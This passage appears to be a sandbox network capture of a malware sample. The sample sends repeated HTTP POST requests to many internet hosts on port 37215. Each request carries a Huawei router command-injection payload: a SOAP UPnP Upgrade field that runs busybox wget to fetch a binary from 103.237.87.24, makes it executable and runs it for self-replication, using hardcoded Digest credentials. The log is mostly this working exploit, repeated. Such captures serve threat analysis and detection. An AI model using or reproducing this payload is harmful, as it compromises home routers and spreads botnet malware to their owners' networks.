20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1736192.168.2.1333026196.131.221.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536808014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1737192.168.2.1354668157.35.91.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536815882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1738192.168.2.1347380129.78.238.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536819935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1739192.168.2.1348142157.216.132.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536880016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1740192.168.2.133373464.42.35.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536881924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1741192.168.2.1335520157.86.166.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536889076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1742192.168.2.1352776197.210.117.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.536889076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1743192.168.2.1343520157.136.68.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537053108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1744192.168.2.1348800157.124.9.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537056923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1745192.168.2.135918846.25.47.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537060976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1746192.168.2.1333112157.246.26.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537069082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
